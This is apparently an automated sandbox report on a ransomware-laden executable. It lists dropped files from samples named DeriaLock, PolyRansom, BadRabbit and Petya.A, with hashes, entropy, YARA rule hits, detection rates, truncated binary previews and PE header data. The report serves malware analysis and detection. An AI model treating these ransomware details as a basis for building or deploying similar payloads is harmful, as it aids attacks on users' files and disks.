                                                                                                                                                Preview:Z){..[.\...6.$...r..T..{$P`jW......-Zr../|.3...j..I9QQ.dW......m.x..uPj.B...p...F....oQ.k...5)...Q.....1`.............S...sq~k.j0...,3B1....uU.3.o..]....K..9A...@.]...../......=...e..Q2..Zt..np...u....E.........s.>...@78V.p.s.)...)ba..P.i[N*.0....l.I..Y...?.M>...)...8%.s[.N..8.......M6.5.0}`\w.7. .T.z.E..F..e...1.b...H..%..2.l.(...a..C....!.Cx...=.?F.Dtq.MX...n...[...N..#...e./(..}<|I.#"..9[p...9..H]...7O;.(...V..7A....Z.=.bW...q....#.....k....h7hnX.9.c[...#.0P._.......p........f.#.N..%..$.W..l.Kz>.$.O|.=....;a>...ec.:.D.i....?...... .w.=7~....\s...le...W....PL^8..*..b)HA...Y9Y.h..jAn}.........9g.....7...5.9..m....(...z.C1g.{..GT.._..MI.8...V)I&.%..!P..".l.T...*.-.g.Y)....E....}A.......[..B...h..u..G..W........P...R.Vz..:.s...eO.MV.Y...x..z..I..s..8%.l....v.6...`F...7...[;.M....>X.h."g.$)..2k..p.M....85.p[.!v.!.8f..97..y.2T..1nE.<.[......p/..q.c...ht...w...w.. ..8f.A.;...b9.....j....2.[...4.F.....z...../=~]c,.....c.g....:.{70.
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):288
                                                                                                                                                Entropy (8bit):7.2850878919396065
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:y7BRaUG0xaCgour7OKpEBdTRAsimV+6dQtBvisuZJ9DTPWvSm5oW48:AuiMrMhhtLsUswlP8SORJ
                                                                                                                                                MD5:5E2A32EA1F7FE7346A3BE9229262FF7C
                                                                                                                                                SHA1:22F876D775AB46FD4B7C5060121A2E16759EB167
                                                                                                                                                SHA-256:14E414988E25F8B49F8ABB34ED5EA8DC833B4CE0224160D17BCAFD19857C6992
                                                                                                                                                SHA-512:0B85FF56CEABBE5B37C02FD2005E8D2A5532B6A7F0333AF3E5FE94D9DD53CB44C7544A18229647E49384815E7E09204F39FAA80970F8430BEE64BB0411EA8286
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:K.\....`..5..:.X.i;1...t9....q.....$NkN...I...j....j..#(..|.{..^.."Jm..CG....E..kh.S...8.=....t....u."c.d.....R...#:.gL....v.f..Z.V.....$......,...9.@.....T....7(4.$Fw.='.q...R./.....f..".o...1....U.<.KJ.....K..1..DR.V..B..3.n.%.[=.......i.+S.7.}.Z..6..T6u..=.......K..
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):512
                                                                                                                                                Entropy (8bit):7.5449424292370075
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12:AuiMrMhhtGMz3j6lccB0jmybFEA+PxCX1q7NXn:LahRzT62cShbFEvW1q7tn
                                                                                                                                                MD5:E1BC4F7581F17635F7728F1BB161F215
                                                                                                                                                SHA1:0D8ADB6920FCFD34BB7C72CACC96129B31D540A3
                                                                                                                                                SHA-256:0FB8C2320E0C8302910E3125CFA7A78E4DA73C7A085F04408D2ECF433A283FC7
                                                                                                                                                SHA-512:0E4CF50EA39BECA432D189B23A7AD63929CFBD371EEB8309680930B3194763F73FC1C662ADA1DF1F5CC6AFD6EFCEDE610035178FF2ACDB986024F0A4F8A74E3A
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:K.\....`..5..:.X.i;1...t9....q.....$NkN...I...j....j..#(..|.{..^.."Jm..CG....E..kh.S...8.=....t....u."c.d.....R...#:.gL....v.f..Z.V.....$......,...9.@h...z..l..........cG....k.\z+s.9.r.G..e.tS.?.C.k..E.....Yd.......$s!..9.N.....@:G$.R.e..U.#u..v9....ln.....o.b..^........T...0.@.\...~...G.pD@|.3.Q....v......Ps.w#..#b..I(n^et.C...O..,.;>..xWK.2.{......J...6{.7"..O.....P...G..d3..?.....F.s.5...D..c2.4r(....=......h..C[..&......s....<...#3.$.....-.Q...B6.^.......k.....Q.?...ys..
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):192
                                                                                                                                                Entropy (8bit):6.893327149057255
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:bmujdMB106RaUGtuxarLHagour7s9Kpt21DdfbGGxBLMnDQYZXfOwEG27dY+MAa5:y7BRaUG0xaCgour7OKpEBdTRAsYpmj9w
                                                                                                                                                MD5:5A4658C7EC3539DC9E8D262637D74AD1
                                                                                                                                                SHA1:2C8BED8B826C7980F4EDE6876A61869E1BEE0E17
                                                                                                                                                SHA-256:317CC4C673749E23C36D12E669DF0716C3A399DFA784613A7D352033CD07359F
                                                                                                                                                SHA-512:3A6CA4CE16C345898CE09F994B016E8FDA4EF0918FF22545B0F0C3CDB6AA182A829EB7ED445577AEF4BDAF90040EDC20BDEF2EB898BAA5B03CA18328736265AE
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:K.\....`..5..:.X.i;1...t9....q.....$NkN...I...j....j..#(..|.{..^.."Jm..CG....E..kh.S...8.=....t....u."c.d.....R...#:.gL...<.....\..#.2....$.<^..'`.....#.?.m`i.wZ...UW".....c.M.\.
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):512
                                                                                                                                                Entropy (8bit):7.649302351810127
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12:AuiMrMhhtLtJY6DTkbS4O5gIIn4I0ieEGWeG6:LahtYYkbS4OjIpeEBeG6
                                                                                                                                                MD5:C0F700E56FB42D222BB5F78ABCFF935A
                                                                                                                                                SHA1:37F273D875908FABD9339E9EF9EC265BFB9C1B4E
                                                                                                                                                SHA-256:934274994290FC22256A2F24D2D5C8BCB2DBE27A52D5B771101990C62345ABE5
                                                                                                                                                SHA-512:986588707B690CBF0421628873BC404ADD3EA35F58D08F0CBCDA14A176A65ECD757748508638798B56CE07757BE0F1C86EC80168E9557384147B485EE0D3C7BA
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:K.\....`..5..:.X.i;1...t9....q.....$NkN...I...j....j..#(..|.{..^.."Jm..CG....E..kh.S...8.=....t....u."c.d.....R...#:.gL....v.f..Z.V.....$......,...9.@.\.7.K.4d.wuFbi....*..@;.o..x.T....9q\#}.....6.z........vs.!yc2...Y.v.C&.%..<.S.jAc......P^....l..3..R.N.X?....wd...#kD.l+.........}."....2O.G..M....e......W..<`r>.5df.Wi.r...J..7c.D..... ......S..#.'.......9.)W..0K..W..c`K_...~........t...f3H\....u,d=./.Z..27!.(%..X..m...xEx.......)..o..J....H5...<.,3n.P.C...._`.F..q^3...z).6.H..bu
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):512
                                                                                                                                                Entropy (8bit):7.579816221244999
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12:AuiMrMhhtHGc9J1ds0nXvsgUcZsWUF8fsEg7FZ:Lah71ds0nUgUcZsWHfU7r
                                                                                                                                                MD5:555FB7D927058E7FA5A588A84CD43F51
                                                                                                                                                SHA1:BE4B856C1BCCDD3175D2096127B582306BB75D09
                                                                                                                                                SHA-256:B20CCF1C189A072D9DAB6E4B96F43E256C14943E9B6A0E67CB3A319C203C77D9
                                                                                                                                                SHA-512:6212DF00BD8DEEF1CC866DD6444E0A1ACE9F284ABDD5632D6B0D060F96A13BB5838C42193B93534E66B4E643CFF1E03179103266C36B5832926D88FDE4A30290
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:K.\....`..5..:.X.i;1...t9....q.....$NkN...I...j....j..#(..|.{..^.."Jm..CG....E..kh.S...8.=....t....u."c.d.....R...#:.gL....v.f..Z.V.....$......,...9.@..Wt.D.D. ..sD......".....2l\...^....y.K`!1...-...q..$..yx.c..~....Kb...zMI.. }.2t......N.Vx..iRa..|........i5|..uc..3......J.V<..m........G..Mg. ..#.......6.(x.=+....hD..e$.1N.."g..........5..z........!.1....f.~P!.^U.h.<v.!s.iy....pOH.c.....Y..$=..-..|R...v.D......<.O...~..~&+..1..k)U.....38.Z..`z...(....c..\.Eg....d.......*.a@.<...!
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\ddft42qg.xs4\Endermanch@PolyRansom.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):207872
                                                                                                                                                Entropy (8bit):7.758360826965676
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:l/sEPb4rGqF+KL23xh78IAo7QUR5uCgeQ+:pAGqFz4xm1p+
                                                                                                                                                MD5:327F75561227DE039329A625537B56A2
                                                                                                                                                SHA1:F69E364B024386D5388408D78744D6D2DDBC6F23
                                                                                                                                                SHA-256:DFF896AD7C5106E2E2E9C47EAAE4F08AED42920251953A19635E9F70F31461E2
                                                                                                                                                SHA-512:36AF4482418B8D380D12ADED950C0399DA483A7133591E3B4022A7FCA44D147A18333EF67E9BD515A5A3C2780C9E1016773F304645B1F8C1006E19ACD10B012C
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......eU!.!4O.!4O.!4O.!4O. 4O.Rich!4O.................PE..L...{....................*...................@....@..........................@.......................................................................................................................................................................text....(.......*.................. ....................................................\.........4.w......p.o...g^...?..Ld......Mi...-7......\.C......I.2$.3..m........j.B]...........}...rP....S.Qt.Y.`>.I...W^.M`m.v..;#...z.3....x...s.Z..C.F.D a\...9.$c...L....Y....{.>........G........*O.` L...+.x...E.......fk..L...C.r..=.k..3.............T..._..7.k.H,..(.?..[...1.uS.8..........V.)...Jw...]..~I..\..`.C..6.9...U.K.M..........AA.......>Y.L.\/.Zs..3k..Bf..#f.....[....J....47....>.\.6.N......Y....F..O ..._..<.?....H.T..Odx^+4........J_.y...{
                                                                                                                                                Process:C:\Users\user\fakAAcAY\dekAkckQ.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):4
                                                                                                                                                Entropy (8bit):2.0
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:9:9
                                                                                                                                                MD5:BACBA5E596E8D942A78ED3DEFFF32BFD
                                                                                                                                                SHA1:F60EAFDB56141BB7B145ECE190EA0D0FD49023B0
                                                                                                                                                SHA-256:4F6E857E5CC31390F555DC480FFCA4F67846E4928CF1DF0D3DCB2CA1D1F0818D
                                                                                                                                                SHA-512:3E66DFCBD1ECE3E6EBCD8B1CA227EAB5D73868E88E29C1A6BCA92A7FD839055368DCAAEE3FD37098111F89B735E3E2FC5B2B154D1E89F6164CFDBFA179B427F3
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:..6c
                                                                                                                                                Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):62328
                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3::
                                                                                                                                                MD5:C7CA77D847F1802502EF3B9228D388E4
                                                                                                                                                SHA1:80AB09116D877B924DFEC5B6E8EB6D3DDE35869E
                                                                                                                                                SHA-256:FDEF2F6DA8C5E8002FA5822E8E4FEA278FBA66C22DF9E13B61C8A95C2F9D585F
                                                                                                                                                SHA-512:B5C23209597ECDDBCDE6CD8E72392721C3C2848385AD3F4C644024979F777FD11F2DD19E763F443C4759BB339B047034997FB06566CE7D4574CF3E4B75F51B7D
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):210632
                                                                                                                                                Entropy (8bit):6.677691827536191
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3072:zCBsPmcx7BTn/irEsrDUxo2vYsWwYEJOXKVviEWuwlVBgzUMqqDLW+z3AHW5:8sPnBT/irETNWiJOXKVvKBgz3qqDL1zt
                                                                                                                                                MD5:EDB72F4A46C39452D1A5414F7D26454A
                                                                                                                                                SHA1:08F94684E83A27F2414F439975B7F8A6D61FC056
                                                                                                                                                SHA-256:0B2F863F4119DC88A22CC97C0A136C88A0127CB026751303B045F7322A8972F6
                                                                                                                                                SHA-512:D62A19436ABA8B2D181C065076B4AB54D7D8159D71237F83F1AFF8C3D132A80290AF39A8142708ACB468D78958C64F338BA6AD0CAB9FBAC001A6A0BDDC0E4FAA
                                                                                                                                                Malicious:true
                                                                                                                                                Yara Hits:
                                                                                                                                                • Rule: INDICATOR_TOOL_ENC_DiskCryptor, Description: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions, Source: C:\Windows\cscc.dat, Author: ditekSHen
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............~...~...~...~..~.....w.~..x...~..x....~..#...~..#....~..#....~.Rich..~.................PE..d...9.S.........."......\...........0.......................................p............. .................................................0..P....P....... ...............`..t...0d...............................................`..(............................text...WI.......J.................. ..h.rdata...|...`...~...N..............@..H.data....0......."..................@....pdata....... ......................@..HINIT.........0...................... ....rsrc........P......................@..B.reloc..L....`......................@..B........................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):142848
                                                                                                                                                Entropy (8bit):6.314365095327337
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3072:1keK/MwGT0834YW3pvyh8fcl/iL62iL6KK:Sn/MZd4YW3pvyxl/ini
                                                                                                                                                MD5:B14D8FAF7F0CBCFAD051CEFE5F39645F
                                                                                                                                                SHA1:AFEEE8B4ACFF87BC469A6F0364A81AE5D60A2ADD
                                                                                                                                                SHA-256:8EBC97E05C8E1073BDA2EFB6F4D00AD7E789260AFA2C276F0C72740B838A0A93
                                                                                                                                                SHA-512:F5DCBF3634AEDFE5B8D6255E20015555343ADD5B1BE3801E62A5987E86A3E52495B5CE3156E4F63CF095D0CEDFB63939EAF39BEA379CCAC82A10A4182B8DED22
                                                                                                                                                Malicious:true
                                                                                                                                                Yara Hits:
                                                                                                                                                • Rule: BadRabbit_Gen, Description: Detects BadRabbit Ransomware, Source: C:\Windows\dispci.exe, Author: Florian Roth
                                                                                                                                                • Rule: sig_8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, Description: Bad Rabbit Ransomware, Source: C:\Windows\dispci.exe, Author: Christiaan Beek
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 96%
                                                                                                                                                • Antivirus: Metadefender, Detection: 86%, Browse
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........sR.. R.. R.. I-. v.. I-$ F.. I-. &.. [.9 Q.. [.) C.. R.. ... I-. _.. I- S.. I-' S.. RichR.. ................PE..L...e..Y............................Ug.......0....@.................................a[....@.................................._..........,............................................................[..@............0...............................text...J........................... ..`.rdata..<@...0...B..................@..@.data...,]...........`..............@....rsrc...,............z..............@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\vizhwbnh.yaz\Endermanch@BadRabbit.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):410760
                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3::
                                                                                                                                                MD5:C4F26ED277B51EF45FA180BE597D96E8
                                                                                                                                                SHA1:E9EFC622924FB965D4A14BDB6223834D9A9007E7
                                                                                                                                                SHA-256:14D82A676B63AB046AE94FA5E41F9F69A65DC7946826CB3D74CEA6C030C2F958
                                                                                                                                                SHA-512:AFC2A8466F106E81D423065B07AED2529CBF690AB4C3E019334F1BEDFB42DC0E0957BE83D860A84B7285BD49285503BFE95A1CF571A678DBC9BDB07789DA928E
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):7
                                                                                                                                                Entropy (8bit):2.2359263506290326
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:t:t
                                                                                                                                                MD5:F1CA165C0DA831C9A17D08C4DECBD114
                                                                                                                                                SHA1:D750F8260312A40968458169B496C40DACC751CA
                                                                                                                                                SHA-256:ACCF036232D2570796BF0ABF71FFE342DC35E2F07B12041FE739D44A06F36AF8
                                                                                                                                                SHA-512:052FF09612F382505B049EF15D9FB83E46430B5EE4EEFB0F865CD1A3A50FDFA6FFF573E0EF940F26E955270502D5774187CD88B90CD53792AC1F6DFA37E4B646
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:Ok.....
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\yngyag0a.2kg\Endermanch@Petya.A.exe
                                                                                                                                                File Type:777 archive data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):512
                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:h7SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSO:n
                                                                                                                                                MD5:0C72F4840E75249A20168F2967905243
                                                                                                                                                SHA1:B84700A32D59D18DA54425DEEDF4A3852A3D5930
                                                                                                                                                SHA-256:714E436B1014DACA0C7CAE1377DD769822FDF346554A58BD601E9181D70B23B5
                                                                                                                                                SHA-512:0FF358A2858C02F4080DBCC125552F88B1FEC63EE6E104B6EBB8F6F398F5E70DC6E82DBFD9BE3EFC7012538DB170ADBDF894C6E56F9C5F63998FB6BA5652278F
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
                                                                                                                                                Process:C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):282
                                                                                                                                                Entropy (8bit):4.885120575367098
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:PzLSLzMRfmWxHLThx0sW26NcwAFeMmvVOIHJFxMVlmJHaVFEG1vv:PKMRJpT0sKDAFSkIrxMVlmJHaVzvv
                                                                                                                                                MD5:3D76B6100402FB39286186736F21B2CF
                                                                                                                                                SHA1:3267DA48E71623AB8E342C06F4733FFD2FF5BEAD
                                                                                                                                                SHA-256:0455D41F72FC7E9C08BF80270E75B86BF879E10DB2407926A10E43F3BDD1233E
                                                                                                                                                SHA-512:33F800C96C7701D4983C9CDAD0F85C2D84EF4FBBB39D8F0B850586593101E9249097AAA5735CE9583A38C71A2500B9D875C2CFE2398BDD64218810FB18F3D949
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:..Pinging 127.0.0.1 with 32 bytes of data:..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128....Ping statistics for 127.0.0.1:.. Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..
                                                                                                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                Entropy (8bit):7.931864841860275
                                                                                                                                                TrID:
                                                                                                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                File name:1jDe7zWnoe.exe
                                                                                                                                                File size:152064
                                                                                                                                                MD5:3ce563e899291b59fa8c57c98cad9b4e
                                                                                                                                                SHA1:7157cc9cf910735727b6601ad4d532cdd0fedc7e
                                                                                                                                                SHA256:4a8031fc97753e95eb440a1f0f100ddcfbca0bca0bb2271dbc775e129282f304
                                                                                                                                                SHA512:827dc0e9f9212ec0d4c1e8c7180c33d387548f7de6d0b45a2eef01f22f69ee571d3f2f8b610b8f671f4b25abaa578431ce758a5e41740e7b8c63ca85ef953469
                                                                                                                                                SSDEEP:3072:/UuL1hDewdkuaLYO/IBK2btFVL1xTevRUyZDDdnN5:/Ue1hyioVgBhnNPK5FZD5n
                                                                                                                                                TLSH:EFE3120874ADF333C7A396F543AC1B044BECA3856951EB4FB5646AF6298735209237B3
                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`.........."......H..........nf... ........@.. ....................................`................................
                                                                                                                                                Icon Hash:00828e8e8686b000
                                                                                                                                                Entrypoint:0x42666e
                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                Digitally signed:false
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                Subsystem:windows gui
                                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                                                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                Time Stamp:0x601F1BA0 [Sat Feb 6 22:43:44 2021 UTC]
                                                                                                                                                TLS Callbacks:
                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                OS Version Major:4
                                                                                                                                                OS Version Minor:0
                                                                                                                                                File Version Major:4
                                                                                                                                                File Version Minor:0
                                                                                                                                                Subsystem Version Major:4
                                                                                                                                                Subsystem Version Minor:0
                                                                                                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                                                Instruction
                                                                                                                                                jmp dword ptr [00402000h]
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x266180x53.text
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x280000x566.rsrc
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x2a0000xc.reloc
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                .text0x20000x246740x24800False0.9706362371575342data7.961089181833591IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                .rsrc0x280000x5660x600False0.408203125data3.9657132211361437IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
